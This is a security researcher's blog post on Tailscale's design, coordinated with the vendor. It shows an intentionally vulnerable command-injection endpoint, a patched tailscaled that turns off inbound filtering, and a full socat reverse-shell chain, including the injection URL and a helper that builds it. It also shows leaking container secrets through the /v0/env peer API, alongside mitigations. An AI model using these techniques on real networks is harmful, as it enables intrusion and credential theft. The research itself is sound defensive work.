We were recently asked to review a Tailscale deployment for one of our clients. Naturally we had to take a look under the hood at how Tailscale implements things - to satisfy our own curiosity as well as to make sure our assumptions about the details were correct. This article explains a couple of the interesting things we found during this process and presents a couple of tricks that might be useful when you next encounter a Tailscale network during a security review, or which might give you some food for thought regarding how you securely deploy Tailscale in your environment.

Tailscale is a VPN-as-a-service solution using WireGuard at the network layer, with a centralised controller architecture. Tailscale focuses on making end-to-end connections between hosts, regardless of what the underlying network topology between them might look like. Another way to look at it is that Tailscale focuses on “just solving the problem” (to quote Jason Scott) and the user experience aims to be seamless - once Tailscale is installed on all the necessary hosts, and everyone has logged in, hosts are just able to communicate. The idea is that this happens more or less no matter what underlying network shenanigans take place. Tailscale takes care of NAT hole punching and finding the best routes for your traffic.

BYO Reverse Shell Anywhere in The Network

One of the use cases for Tailscale is as a replacement for the traditional corporate VPN. Fine-grained network access controls may be applied between arbitrary groups of hosts or users without needing to reconfigure the underlying network or think too much about the topology. Administrators configure the network access controls in the Tailscale administrative panel or by API, then these are enforced by the Tailscale clients. At this stage, Tailscale only supports ingress access control rules: all outbound network traffic leaving a host is allowed.

This flexibility cuts both ways. A peer-to-peer mesh network still must enforce firewall rules somewhere, and so with Tailscale this enforcement happens on every node in the network individually, rather than at the traditional boundaries between network segments (network firewalls).

This isn’t exactly a new idea - the security world has encouraged “host-based firewalls” as an adjunct to network controls for a long time. But it does have one novel implication when it’s combined with a peer-to-peer flat overlay network: you can opt out of the firewall.

And you might ask: But why? Surely if you opt out of the firewall, you’re just opening yourself up to additional risk. And that’s true…

But what if you want to run a sneaky QuakeWorld server for your colleagues? Or perhaps more interestingly for security purposes - what if you compromise a server somewhere deep in the network and can’t get a reverse shell out of it?



Imagine the following scenario: An intranet server running some hypothetical wiki software with a blind code execution vulnerability. The server runs Tailscale so that employees of the company can access the intranet from their corporate workstations.

Imagine a vulnerability that looks a bit like this:

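```python
import subprocess

from flask import Flask, request

app = Flask(__name__)


@app.route("/admin")
def admin():
    # Attacker-controlled input goes straight to a shell; the output is discarded.
    admin_command = request.args.get('cmd', '')
    subprocess.run(admin_command, shell=True)
    return "Not allowed\n"
```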

As an attacker this is a great opportunity. But because the call to subprocess here isn’t returning any of the output from the command it runs, using it to practically compromise the host becomes a lot more challenging.

Here’s what the simple Tailscale ACL definition looks like to allow the web browser traffic originating from corporate workstations to access the intranet server:

```json
{
  "action": "accept",
  "src": ["[email protected]"],
  "dst": ["tag:intranet:443"],
},
```

This ACL allows Michael’s workstation to connect to the intranet server, but it doesn’t inherently allow connections from the intranet server back to Michael’s workstation. But… Tailscale has built a tunnel directly between the intranet server and the workstation… Since Tailscale’s ACLs are inbound-only and implemented on the client, a network connection that originates at the intranet server end is only stopped once it reaches the workstation. If we control the workstation, we can still choose to accept that connection even if the Tailscale network ACL wouldn’t normally permit it.
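To make the "enforced only at the receiver" point concrete, here is a toy model in Python. It is a sketch of the idea rather than anything resembling Tailscale's real code: the `Node` class, `connect` function and `filter_enabled` flag are all names we made up for illustration.

```python
from dataclasses import dataclass, field


@dataclass
class Node:
    """A toy tailnet node that enforces inbound ACLs itself (hypothetical model)."""
    name: str
    # (source node name, destination port) pairs this node will accept.
    inbound_allow: set = field(default_factory=set)
    # Whoever controls the node controls this switch.
    filter_enabled: bool = True

    def accepts(self, src: "Node", port: int) -> bool:
        if not self.filter_enabled:
            return True
        return (src.name, port) in self.inbound_allow


def connect(src: Node, dst: Node, port: int) -> bool:
    """Outbound traffic is never filtered, so only the receiver decides."""
    return dst.accepts(src, port)


workstation = Node("workstation")
intranet = Node("intranet", inbound_allow={("workstation", 443)})

print(connect(workstation, intranet, 443))   # True: allowed by the ACL
print(connect(intranet, workstation, 1234))  # False: dropped by the workstation

workstation.filter_enabled = False           # attacker patches their own client
print(connect(intranet, workstation, 1234))  # True: nothing else is in the way
```

Nothing on the sending side or in the middle of the path gets a vote, which is the whole trick.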

Tailscale client software is open source. If you have sufficient access to the machine where Tailscale is running (such as the workstation in this example) you can modify the client to disable the incoming packet filter and start accepting inbound connections from anywhere else on the Tailscale network. Conveniently, the network filtering code also only examines “new connection” setup packets (e.g. TCP SYN packets), so your return packets for the other half of your TCP stream will flow just fine without needing to modify any ACLs or control both ends of the connection.
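The reason the return half of the stream just works can be sketched with a stateless filter that only looks at connection-opening packets. This is a simplified model, and it assumes "new connection" means a TCP segment with SYN set and ACK clear; the function names are ours, not Tailscale's.

```python
# Standard TCP flag bits.
SYN = 0x02
ACK = 0x10


def is_new_connection(tcp_flags: int) -> bool:
    """True for the first packet of a handshake (SYN set, ACK clear)."""
    return (tcp_flags & SYN) != 0 and (tcp_flags & ACK) == 0


def filter_in(tcp_flags: int, acl_allows: bool) -> str:
    """Toy stateless inbound filter: only connection setup packets are checked."""
    if is_new_connection(tcp_flags) and not acl_allows:
        return "drop"
    return "accept"


# On the intranet server, no ACL allows the workstation to reach port 1234...
print(filter_in(SYN, acl_allows=False))        # drop: workstation can't dial in
# ...but replies to a connection the server opened itself sail through.
print(filter_in(SYN | ACK, acl_allows=False))  # accept: handshake reply
print(filter_in(ACK, acl_allows=False))        # accept: established traffic
```

So only the workstation's filter needs to be disabled; the intranet server's unmodified filter never sees anything it would object to.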

As a demonstration, we can download the latest Tailscale client source, patch a line in the code to disable packet filtering and re-build tailscaled. We’d then upload this patched client to the corporate workstation we’ve compromised:

```
$ git clone https://github.com/tailscale/tailscale
$ cd tailscale
$ patch -l -p1 <<'EOF'
--- a/net/tstun/wrap.go
+++ b/net/tstun/wrap.go
@@ -665,7 +665,7 @@ func (t *Wrapper) filterIn(buf []byte) filter.Response {
 // like wireguard-go/tun.Device.Write.
 func (t *Wrapper) Write(buf []byte, offset int) (int, error) {
     metricPacketIn.Add(1)
-    if !t.disableFilter {
+    if false {
         if t.filterIn(buf[offset:]) != filter.Accept {
             metricPacketInDrop.Add(1)
             // If we're not accepting the packet, lie to wireguard-go and pretend
EOF
$ ./build_dist.sh tailscale.com/cmd/tailscaled
```

Here we replace the tailscaled binary on the workstation and restart the service:

```
$ sudo systemctl stop tailscaled
$ sudo cp tailscaled /usr/sbin/tailscaled
$ sudo systemctl start tailscaled
```

Incoming connections to any port should now be possible through Tailscale. To test, we fire up a socat listener:

```
$ socat -d -d TCP-LISTEN:1234,reuseaddr STDOUT
```

And then getting a reverse shell is as simple as using the vulnerable function above to run socat (or any other reverse shell mechanism) on the intranet server and connect back to the local Tailscale IP on the workstation:

```
$ curl 'http://100.120.116.54/admin?cmd=socat%20TCP%3A100.122.53.21%3A1234%20EXEC%3Ash'
```
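If you'd rather not percent-encode payloads by hand, the request URL can be built with Python's standard library. This is just a convenience sketch; `build_exploit_url` is a hypothetical helper name, and the addresses are the ones from our lab above.

```python
from urllib.parse import quote


def build_exploit_url(target: str, listener: str, port: int) -> str:
    """Build the /admin URL that makes the target run socat back to us."""
    command = f"socat TCP:{listener}:{port} EXEC:sh"
    # safe='' forces ':' and ' ' to be percent-encoded as well.
    return f"http://{target}/admin?cmd={quote(command, safe='')}"


url = build_exploit_url("100.120.116.54", "100.122.53.21", 1234)
print(url)
# http://100.120.116.54/admin?cmd=socat%20TCP%3A100.122.53.21%3A1234%20EXEC%3Ash
```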

We now have a reverse shell delivered straight to us from the Tailscale interface:

```
$ socat -d -d TCP-LISTEN:1234,reuseaddr STDOUT
2022/05/06 03:39:29 socat[6014] N listening on AF=2 0.0.0.0:1234
2022/05/06 03:39:32 socat[6014] N accepting connection from AF=2 100.120.116.54:52622 on AF=2 100.122.53.21:1234
2022/05/06 03:39:32 socat[6014] N using stdout for reading and writing
2022/05/06 03:39:32 socat[6014] N starting data transfer loop with FDs [6,6] and [1,1]
ls
__pycache__
intranet.py
run.sh
venv
```

The only requirement in the Tailscale ACL configuration for this to work is that both hosts must have at least some connectivity in at least one direction between them. If there’s no allowed connectivity at all between hosts, then Tailscale will optimise the network without any routing between those hosts. Fortunately, there should always be at least one network ACL allowing connections to a server if clients access any services on it.

It’s interesting to think about how this issue could be mitigated. Careful endpoint detection and response (EDR) design, such as continuously monitoring the integrity of the tailscaled binaries and processes, might be your best bet. It’s hard to imagine what else could be done without fundamentally changing how Tailscale works, or without relying on controls that a similarly placed attacker can easily defeat (such as additional iptables firewalling on the workstation).
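As a very rough illustration of the binary integrity idea, the sketch below compares the SHA-256 digest of a file against a known-good value. The function names are ours, and where the known-good digest comes from (your package repository, a build pipeline, and so on) is left as an assumption. A real EDR control would need to run and report somewhere the attacker can't reach, since anyone able to swap the binary can probably tamper with a local script too.

```python
import hashlib
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Return the hex SHA-256 digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def binary_is_untampered(path: Path, known_good_sha256: str) -> bool:
    """Compare the on-disk binary against a digest recorded at install time."""
    return sha256_of(path) == known_good_sha256.lower()
```

On the workstation from our example you would call something like `binary_is_untampered(Path("/usr/sbin/tailscaled"), expected)` on a schedule and alert on `False`.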

Tailscale Client API Information Leakage

A lot of the more recent Tailscale functionality relies on tailscaled implementing a small HTTP API server on each host that is permanently excluded from network filtering rules. Tailscale calls this the “peer API”. The endpoints available on this server seem somewhat in flux as features are being added to Tailscale. The following code portion from net/tstun/wrap.go shows how the API is permanently allowed through the filter:

```go
// Let peerapi through the filter; its ACLs are handled at L7,
// not at the packet level.
if outcome != filter.Accept &&
	p.IPProto == ipproto.TCP &&
	p.TCPFlags&packet.TCPSyn != 0 &&
	t.PeerAPIPort != nil {
	if port, ok := t.PeerAPIPort(p.Dst.IP()); ok && port == p.Dst.Port() {
		outcome = filter.Accept
	}
}
```

Specifically, we looked at the /v0/env endpoint, which lets you retrieve the tailscaled process environment from any other machine that’s logged in as the same Tailscale user.

The output isn’t especially exciting in the standard case:

```
$ curl http://100.122.53.21:37577/v0/env
{"Hostinfo":{"IPNVersion":"1.25.50-tf9e86e64b","OS":"linux","OSVersion":"Debian 11.2 (bullseye); kernel=5.10.0-12-amd64","Desktop":false,"Hostname":"ts1","GoArch":"amd64"},"Uid":0,"Args":["/usr/sbin/tailscaled","--state=/var/lib/tailscale/tailscaled.state","--socket=/run/tailscale/tailscaled.sock","--port","41641"],"Env":["LANG=C.UTF-8","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","NOTIFY_SOCKET=/run/systemd/notify","INVOCATION_ID=...","JOURNAL_STREAM=8:25816","RUNTIME_DIRECTORY=/run/tailscale","STATE_DIRECTORY=/var/lib/tailscale","CACHE_DIRECTORY=/var/cache/tailscale","PORT=41641","FLAGS="]}
```

However, things are more interesting when running Tailscale in a Docker container or as part of a Kubernetes deployment, as all processes in the container inherit environment variables passed to the container and sensitive information is often passed to the apps within using the environment. Consider the following:

```
$ docker run -it -e pulse_api_key=bigbreakfast debian:latest
...snip...
# curl https://tailscale.com/install.sh | sh
...snip...
# tailscaled --tun=userspace-networking --socks5-server=localhost:1055 &
# tailscale up --authkey=tskey-kPCW...redacted...
...snip...
peerapi: serving on http://100.65.15.71:63001
```

From another Tailscale node that’s logged in as the same user we can now leak that pulse_api_key value:

```
$ curl http://100.65.15.71:63001/v0/env
{"Hostinfo":{"IPNVersion":"1.24.2-t9d6867fb0-g2d0f7ddc3","OS":"linux","OSVersion":"Debian 11.3 (bullseye); kernel=5.10.0-14-amd64","Desktop":false,"Hostname":"53473c930688","GoArch":"amd64"},"Uid":0,"Args":["tailscaled","--tun=userspace-networking","--socks5-server=localhost:1055"],"Env":["HOSTNAME=53473c930688","PWD=/","pulse_api_key=bigbreakfast","HOME=/root","TERM=xterm","SHLVL=1","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","_=/usr/sbin/tailscaled"]}
```
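During a review you may want to pick out the interesting entries from a response like this automatically. The following sketch parses a `/v0/env` body and flags variables whose names look like credentials. The name pattern is our own guess at what "sensitive" looks like, the helper name is hypothetical, and the sample is a trimmed copy of the output above.

```python
import json
import re

# Heuristic only: variable names that commonly hold credentials.
SENSITIVE_NAME = re.compile(r"(key|token|secret|passw)", re.IGNORECASE)


def suspicious_env(response_body: str) -> dict:
    """Return {name: value} for env entries whose names look sensitive."""
    env = json.loads(response_body).get("Env", [])
    found = {}
    for entry in env:
        name, _, value = entry.partition("=")
        if SENSITIVE_NAME.search(name):
            found[name] = value
    return found


sample = (
    '{"Uid":0,"Args":["tailscaled"],'
    '"Env":["HOSTNAME=53473c930688","PWD=/",'
    '"pulse_api_key=bigbreakfast","HOME=/root"]}'
)
print(suspicious_env(sample))  # {'pulse_api_key': 'bigbreakfast'}
```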

Fortunately, this is now easy to avoid, since Tailscale auth keys can be created that automatically make the hosts redeeming them (such as a set of containers) owned by a tag set rather than a specific user. This is an intentional decision on the part of Tailscale, but as a tailnet administrator you still have to make sure your containers are running with tags rather than as a human user if you want to stop containers leaking each other’s environment variables. Let’s dig into the API authentication a little further to see how this is implemented.

Tailscale binds authenticated user identities to specific IP addresses. Inside peerapi.go, when an inbound request arrives for a sensitive method such as env, a check is made to determine whether the inbound connection’s originating user matches the currently logged-in Tailscale user of the local node.

In the case of the /v0/env API endpoint, the check being executed is canDebug:

```go
func (h *peerAPIHandler) handleServeEnv(w http.ResponseWriter, r *http.Request) {
	if !h.canDebug() {
		http.Error(w, "denied; no debug access", http.StatusForbidden)
		return
	}
```

canDebug is a wrapper around both the newer “peer capabilities” system being developed by Tailscale at the moment, and the older isSelf mechanism for determining if a remote user matches the local user:

```go
// canDebug reports whether h can debug this node (goroutines, metrics,
// magicsock internal state, etc).
func (h *peerAPIHandler) canDebug() bool {
	return h.isSelf || h.peerHasCap(tailcfg.CapabilityDebugPeer)
}
```

isSelf (line 515) below is set during new connection setup for the API endpoint:

```
505 func (pln *peerAPIListener) ServeConn(src netaddr.IPPort, c net.Conn) {
506     logf := pln.lb.logf
507     peerNode, peerUser, ok := pln.lb.WhoIs(src)
508     if !ok {
509         logf("peerapi: unknown peer %v", src)
510         c.Close()
511         return
512     }
513     h := &peerAPIHandler{
514         ps:         pln.ps,
515         isSelf:     pln.ps.selfNode.User == peerNode.User,
516         remoteAddr: src,
517         peerNode:   peerNode,
518         peerUser:   peerUser,
519     }
520     httpServer := &http.Server{
521         Handler: h,
522     }
523     if addH2C != nil {
524         addH2C(httpServer)
525     }
526     go httpServer.Serve(netutil.NewOneConnListener(c, pln.ln.Addr()))
527 }
```

The .User properties here are Tailscale’s 64-bit integer user ID values. You can see what the values are for your user from the output of tailscale status --json:

```
fincham@ts1:~$ tailscale status --json
...snip...
  "User": {
    "14718391840189877": {
      "ID": 14718391840189877,
      "LoginName": "tagged-devices",
      "DisplayName": "Tagged Devices",
      "ProfilePicURL": "",
      "Roles": []
    },
...snip...
    "57942128119298820": {
      "ID": 57942128119298820,
      "LoginName": "ts1.hotplate.co.nz",
      "DisplayName": "ts1",
      "ProfilePicURL": "",
      "Roles": []
    }
  }
}
```

From this output you can see tagged devices are given the generic tagged-devices user with an ID which does not match the ID of the tagged device itself, and as such the isSelf check fails and tagged devices cannot call each other’s env methods.
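The decision boils down to a comparison of two integers plus an optional capability. Here is the same logic restated as a small Python sketch: the two tagged-node IDs come from the status output above, while `HUMAN_USER_ID` is a made-up value standing in for a shared human login, and the function names are ours.

```python
def is_self(self_user_id: int, peer_user_id: int) -> bool:
    """Mirror of the isSelf comparison: same owning user on both ends."""
    return self_user_id == peer_user_id


def can_debug(self_user_id: int, peer_user_id: int,
              peer_has_debug_cap: bool = False) -> bool:
    """Mirror of canDebug: same user, or an explicitly granted capability."""
    return is_self(self_user_id, peer_user_id) or peer_has_debug_cap


TAGGED_DEVICES_ID = 14718391840189877  # generic "tagged-devices" user
TS1_ID = 57942128119298820             # the tagged node's own user ID
HUMAN_USER_ID = 1111111111111111       # hypothetical shared human login

# A tagged peer shows up as "tagged-devices", which never equals the local ID.
print(can_debug(TS1_ID, TAGGED_DEVICES_ID))      # False
# Two containers logged in as the same human user match, so /v0/env is served.
print(can_debug(HUMAN_USER_ID, HUMAN_USER_ID))   # True
```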

By patching tailscaled again we can prove this to ourselves. This patch adds some explicit logging of the peer user IDs and peerAPI authentication decisions:

```diff
diff --git a/ipn/ipnlocal/peerapi.go b/ipn/ipnlocal/peerapi.go
index 0031ecc4..ed2e25b3 100644
--- a/ipn/ipnlocal/peerapi.go
+++ b/ipn/ipnlocal/peerapi.go
@@ -505,6 +505,7 @@ func (pln *peerAPIListener) serve() {
 func (pln *peerAPIListener) ServeConn(src netaddr.IPPort, c net.Conn) {
     logf := pln.lb.logf
     peerNode, peerUser, ok := pln.lb.WhoIs(src)
+    fmt.Printf("[!!!] Me: %d Them: %d\n", pln.ps.selfNode.User, peerNode.User)
     if !ok {
         logf("peerapi: unknown peer %v", src)
         c.Close()
@@ -684,6 +685,7 @@ func (h *peerAPIHandler) canPutFile() bool {
 // canDebug reports whether h can debug this node (goroutines, metrics,
 // magicsock internal state, etc).
 func (h *peerAPIHandler) canDebug() bool {
+    fmt.Printf("[!!!] Can debug isSelf: %b hasCap: %b\n", h.isSelf, h.peerHasCap(tailcfg.CapabilityDebugPeer))
     return h.isSelf || h.peerHasCap(tailcfg.CapabilityDebugPeer)
 }
```

Here’s a sample log output showing two “tagged” devices connecting to one another and trying to access the peer API. Here the remote node identifies itself with the user ID 17580690071157845 (the tagged-devices ID for this tailnet) which doesn’t match the node’s local user ID of 65121477618233550, so access is denied:

```
Accept: TCP{100.65.212.122:54970 > 100.70.132.38:61650} 60 tcp ok
[!!!] Me: 65121477618233550 Them: 17580690071157845
[!!!] Can debug isSelf: %!b(bool=false) hasCap: %!b(bool=false)
```

You can address this environment variable leakage issue by stringently using tag sets. Additionally, a belt-and-braces fix on top of using tag sets would be to launch tailscaled with a sanitised environment using something like env or systemd.
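As a sketch of the sanitised-environment idea, a launcher can pass tailscaled only an allowlisted subset of its own environment. The allowlist below is an assumption on our part (we haven't checked exactly which variables tailscaled needs in every setup), and `sanitised_env` is a hypothetical helper.

```python
import os

# Assumed allowlist; extend it if tailscaled needs more in your environment.
ALLOWED_VARS = frozenset({"PATH", "LANG", "HOME"})


def sanitised_env(env, allowed=ALLOWED_VARS) -> dict:
    """Return a copy of env containing only allowlisted variable names."""
    return {name: value for name, value in env.items() if name in allowed}


container_env = {
    "PATH": "/usr/sbin:/usr/bin",
    "HOME": "/root",
    "pulse_api_key": "bigbreakfast",
}
print(sanitised_env(container_env))
# {'PATH': '/usr/sbin:/usr/bin', 'HOME': '/root'}

# To launch the daemon with the cleaned environment you could then use:
#   subprocess.Popen(["tailscaled", "--tun=userspace-networking"],
#                    env=sanitised_env(os.environ))
```

An allowlist is the safer direction here: a denylist only helps with the secrets you remembered to name.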

Conclusion

The tricks we’re discussing here are not new vulnerabilities, strictly speaking. The Tailscale folks know about these issues, and we discussed this blog post with them before publishing it. The practical implications of a design aren’t always immediately obvious, and that’s where interesting security “things” can happen. Here is Tailscale’s response after we shared a draft of this post with them:

You’re right that since ACLs and device firewalls only apply to inbound traffic, if you can manage a device, you could re-install a modified version of Tailscale to allow any traffic to the device. As you point out, right now, the best way to protect against this issue would be with endpoint monitoring on the device. In the future, we hope to make it easier for you to audit connections to identify unexpected traffic.

Thanks for discovering that containers logged in as the same user leak environment variables to each other; although this isn’t great, since they share an identity the exposure is limited. We will plan to address this. Again, as you point out, we recommend in our hardening guide that devices that don’t belong to an individual should be managed using an ACL tag.

Thank you Pulse Security for doing this research and reporting these concerns to us! If you find any security issues with Tailscale, let us know following the instructions at tailscale.com/security.

I think Tailscale is kind of neat. Anything that gets the world further away from the castle model corporate VPN is to be celebrated. We’ve barely scratched the surface of things you can do with Tailscale in this blog post, and they’re certainly coming up with a lot of new ideas that will have interesting security implications.